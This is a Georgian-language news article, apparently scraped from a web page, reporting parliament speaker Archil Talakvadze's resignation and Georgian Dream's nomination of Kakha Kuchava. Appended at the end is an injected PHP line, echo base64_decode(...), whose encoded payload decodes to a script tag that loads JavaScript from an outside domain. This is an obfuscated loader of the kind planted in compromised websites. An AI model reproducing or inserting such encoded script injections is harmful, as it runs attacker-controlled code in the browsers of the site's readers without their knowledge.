celsiusi
ავერსი საქკაბელი
„ჩემი ადგილი დარბაზშია კოლეგების გვერდით და არა სპიკერის როლში“, - ამის შესახებ საქართველოს პარლამენტის თავმჯდომარე არჩილ თალაკვაძემ, პარტიის ოფისში გამართულ ბრიფინგზე განაცხადა.
 
როგორც თალაკვაძე განმარტავს, მისთვის დიდი პატივი იყო მე-9 და მე-10 მოწვევის პარლამენტებში პარლამენტის თავმჯდომარის პოსტზე მუშაობა.
 
„იმის გათვალისწინებით, რომ რამდენიმეთვიანი დაძაბული მოლაპარაკებები დასრულდა შეთანხმებით, რომელშიც პარტიის თავმჯდომარესთან ერთად მე წარმოვადგენდი, ვთვლი, რომ პარლამენტში შემდგომი პოლიტიკური პროცესის სწორად წარმართვისთვის მართებული იქნება დავტოვო სპიკერის პოზიცია და ამ თანამდებობაზე წარვადგინოთ ადამიანი, რომელიც პარლამენტის მუშაობას უფრო ნეიტრალური პოზიციიდან გაუძღვება. შესაბამისად, მივიღეთ გადაწყვეტილება გავაკეთოთ როტაცია.
 
ახლა, როდესაც პარლამენტში წარმომადგენლობითი ოპოზიცია გვყავს, ვთვლი, ჩემი ადგილი დარბაზშია კოლეგების გვერდით და არა სპიკერის როლში. ჩემთვის დიდი პატივი იყო მე-9 და მე-10 მოწვევის პარლამენტებში პარლამენტის თავმჯდომარის პოსტზე მუშაობა. მადლობას ვუხდი გუნდს და ჩვენს თანამოქალაქეებს მხარდაჭერისთვის მოთმინებისა და გვერდით დგომისთვის. ერთად განვაგრძობთ მუშაობას და ბრძოლას მომავალი წარმატებისთვის და ჩვენ აუცილებლად მოვიპოვებთ ახალ გამარჯვებებს და უზრუნველვყოფთ ქვეყანაში პროგრესს“,- განაცახდა თალაკვაძემ.
 
ცნობისთვის, საქართველოს პარლამენტის თავმჯდომარე არჩილ თალაკვაძე თანამდებობიდან გადადგა. "ქართულმა ოცნებამ" სპიკერის პოზიციაზე კახა კუჭავას კანდიდატურა წარადგინა.
1289
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");